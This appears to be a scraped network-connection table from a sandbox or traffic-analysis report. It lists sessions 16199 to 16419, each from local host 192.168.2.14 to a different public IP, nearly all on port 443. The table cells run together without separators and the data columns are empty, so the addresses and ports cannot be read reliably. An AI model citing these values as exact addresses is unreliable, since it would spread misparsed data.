                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16199192.168.2.1456926208.81.214.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16200192.168.2.144180261.17.153.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16201192.168.2.1439218206.236.225.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16202192.168.2.1454542208.184.36.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16203192.168.2.145217641.85.106.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16204192.168.2.1455406212.20.91.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16205192.168.2.14549581.132.176.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16206192.168.2.144846287.141.135.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16207192.168.2.144763090.173.197.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16208192.168.2.1436884169.26.122.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16209192.168.2.1454068133.190.95.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16210192.168.2.1455304136.214.126.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16211192.168.2.1455312153.73.217.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16212192.168.2.143581647.123.229.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16213192.168.2.1453450137.202.186.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16214192.168.2.143289490.236.222.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16215192.168.2.145248889.134.6.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16216192.168.2.143505037.22.139.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16217192.168.2.1437436213.3.57.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16218192.168.2.144420682.226.141.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16219192.168.2.1447274203.156.62.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16220192.168.2.143619274.193.76.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16221192.168.2.144110046.83.33.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16222192.168.2.1434472144.3.14.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16223192.168.2.1443418208.238.62.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16224192.168.2.145000060.57.242.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16225192.168.2.1459332217.167.117.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16226192.168.2.145423239.195.148.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16227192.168.2.1450824103.229.215.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16228192.168.2.1438970144.57.133.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16229192.168.2.1435754178.124.183.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16230192.168.2.1460418197.162.17.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16231192.168.2.143742634.150.234.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16232192.168.2.1444946203.224.160.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16233192.168.2.144406244.97.210.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16234192.168.2.144799465.224.112.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16235192.168.2.1443096121.69.89.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16236192.168.2.145881025.14.26.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16237192.168.2.143833897.241.13.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16238192.168.2.1439316140.249.122.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16239192.168.2.1448084121.75.115.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16240192.168.2.1456088185.70.96.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16241192.168.2.1447888220.162.37.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16242192.168.2.1457448174.230.186.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16243192.168.2.1448994140.33.230.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16244192.168.2.145388231.11.106.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16245192.168.2.1449642221.149.151.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16246192.168.2.1439306141.60.99.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16247192.168.2.1447924223.220.223.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16248192.168.2.1445396220.44.21.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16249192.168.2.1452550110.234.81.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16250192.168.2.1456182188.253.2.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16251192.168.2.1460272170.197.154.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16252192.168.2.1446872138.136.93.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16253192.168.2.145299819.219.111.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16254192.168.2.1435786157.187.216.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16255192.168.2.144511858.166.137.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16256192.168.2.144128662.229.133.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16257192.168.2.1448276163.96.180.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16258192.168.2.1450278222.150.129.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16259192.168.2.145854813.71.14.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16260192.168.2.144024837.179.88.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16261192.168.2.144425890.54.22.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16262192.168.2.1437390163.129.24.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16263192.168.2.1456428204.50.191.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16264192.168.2.143656046.175.239.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16265192.168.2.14362121.44.87.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16266192.168.2.144277880.24.38.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16267192.168.2.144152267.78.14.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16268192.168.2.1453848118.103.215.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16269192.168.2.1435138216.178.8.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16270192.168.2.1441954191.12.177.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16271192.168.2.144986680.103.212.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16272192.168.2.145767463.115.163.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16273192.168.2.1436718193.253.236.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16274192.168.2.1439722195.92.247.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16275192.168.2.1458070130.209.82.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16276192.168.2.144706279.136.2.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16277192.168.2.1443862182.82.50.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16278192.168.2.1446668201.234.11.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16279192.168.2.144748673.144.10.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16280192.168.2.143846248.210.164.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16281192.168.2.1451274112.139.171.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16282192.168.2.1443212186.7.248.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16283192.168.2.1433284103.46.49.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16284192.168.2.1433190186.217.31.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16285192.168.2.1459552189.0.105.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16286192.168.2.1445804164.120.82.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16287192.168.2.145264464.167.231.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16288192.168.2.1433960166.18.33.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16289192.168.2.143669461.123.176.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16290192.168.2.1445530203.132.122.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16291192.168.2.145102461.13.100.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16292192.168.2.1439582138.97.171.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16293192.168.2.146037624.169.179.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16294192.168.2.1449208196.226.31.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16295192.168.2.144577027.250.138.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16296192.168.2.1442058161.155.175.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16297192.168.2.1437884218.60.245.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16298192.168.2.1458104155.192.164.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16299192.168.2.1448006146.146.154.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16300192.168.2.1443162223.137.141.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16301192.168.2.1437136117.170.120.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16302192.168.2.145529836.146.149.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16303192.168.2.1445552106.224.170.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16304192.168.2.143503834.254.19.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16305192.168.2.1458012188.37.81.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16306192.168.2.145025267.173.133.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16307192.168.2.1446526137.117.167.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16308192.168.2.1450080171.107.5.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16309192.168.2.144725240.118.0.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16310192.168.2.1455004101.173.100.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16311192.168.2.1433136106.227.185.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16312192.168.2.144400893.91.109.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16313192.168.2.143531814.240.168.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16314192.168.2.1454208162.2.197.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16315192.168.2.144807295.151.38.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16316192.168.2.1436698160.93.74.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16317192.168.2.1435790119.149.15.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16318192.168.2.145448817.23.9.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16319192.168.2.1444960137.252.206.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16320192.168.2.1442422119.95.197.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16321192.168.2.144927848.156.19.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16322192.168.2.145595070.178.196.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16323192.168.2.1433106198.115.122.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16324192.168.2.145199880.70.167.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16325192.168.2.143536260.190.39.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16326192.168.2.1458662106.125.63.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16327192.168.2.1437440212.62.36.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16328192.168.2.1458028156.250.161.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16329192.168.2.1435484126.167.206.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16330192.168.2.144667850.76.102.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16331192.168.2.14343344.43.105.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16332192.168.2.1439478216.71.47.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16333192.168.2.1444560139.73.98.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16334192.168.2.146054236.108.155.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16335192.168.2.145768072.127.158.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16336192.168.2.1439888137.194.178.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16337192.168.2.1439700209.93.82.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16338192.168.2.1454758104.222.141.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16339192.168.2.1435400162.93.65.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16340192.168.2.1437678195.25.143.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16341192.168.2.145511688.13.142.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16342192.168.2.1441830120.139.227.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16343192.168.2.14482908.163.55.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16344192.168.2.145566677.122.167.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16345192.168.2.1437664143.76.77.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16346192.168.2.144504678.123.205.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16347192.168.2.1444198157.210.97.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16348192.168.2.145421635.162.126.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16349192.168.2.1459914183.54.168.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16350192.168.2.1432798125.175.163.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16351192.168.2.1438638186.222.50.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16352192.168.2.1444924113.125.214.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16353192.168.2.1444660158.88.238.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16354192.168.2.1437814204.202.24.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16355192.168.2.144838618.3.34.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16356192.168.2.1444626113.144.139.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16357192.168.2.145730685.180.233.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16358192.168.2.144130446.10.49.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16359192.168.2.144664076.237.177.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16360192.168.2.1454722179.156.17.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16361192.168.2.1439214129.86.156.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16362192.168.2.1454244101.117.4.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16363192.168.2.1458990208.85.159.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16364192.168.2.1458534122.28.59.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16365192.168.2.1441702123.24.197.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16366192.168.2.1441572115.25.161.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16367192.168.2.1449974155.135.15.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16368192.168.2.1452292207.187.2.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16369192.168.2.1440724219.65.79.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16370192.168.2.144423043.123.26.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16371192.168.2.1442992181.168.33.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16372192.168.2.1456820203.201.91.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16373192.168.2.1453546103.39.187.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16374192.168.2.1447482208.126.246.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16375192.168.2.1460508194.109.35.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16376192.168.2.144449685.137.189.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16377192.168.2.143424251.177.5.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16378192.168.2.1455398125.169.209.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16379192.168.2.1439382110.212.93.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16380192.168.2.143477662.158.185.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16381192.168.2.146077469.168.222.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16382192.168.2.1438282167.101.67.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16383192.168.2.1432824115.31.251.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16384192.168.2.144716649.18.45.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16385192.168.2.1454886204.96.20.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16386192.168.2.1441666218.5.137.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16387192.168.2.143728496.62.61.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16388192.168.2.1440332114.229.211.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16389192.168.2.1440110194.25.49.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16390192.168.2.1436224112.224.248.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16391192.168.2.145407614.163.55.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16392192.168.2.1458206103.158.162.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16393192.168.2.1438262114.245.84.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16394192.168.2.143789884.149.215.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16395192.168.2.1441480201.117.213.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16396192.168.2.145972478.250.126.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16397192.168.2.1456324113.55.223.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16398192.168.2.1456028161.124.154.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16399192.168.2.1449242170.184.202.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16400192.168.2.1440704168.198.75.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16401192.168.2.143574213.223.132.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16402192.168.2.145359269.179.103.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16403192.168.2.145624453.182.8.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16404192.168.2.1442584154.144.158.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16405192.168.2.1440804222.184.238.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16406192.168.2.1446644113.120.60.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16407192.168.2.1455892201.128.179.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16408192.168.2.1441182187.144.100.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16409192.168.2.14448869.207.63.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16410192.168.2.144613623.43.223.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16411192.168.2.144761292.196.237.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16412192.168.2.1438524144.1.15.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16413192.168.2.144896876.241.246.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16414192.168.2.1446270156.100.202.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16415192.168.2.1455248133.168.74.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16416192.168.2.14542228.207.124.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16417192.168.2.145535239.10.117.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16418192.168.2.1439098162.69.110.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16419192.168.2.1460258172.64.46.648080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
